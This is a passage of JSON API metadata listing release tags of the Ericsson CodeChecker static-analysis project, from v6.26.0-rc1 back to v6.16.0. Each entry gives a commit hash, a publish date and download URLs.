tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcod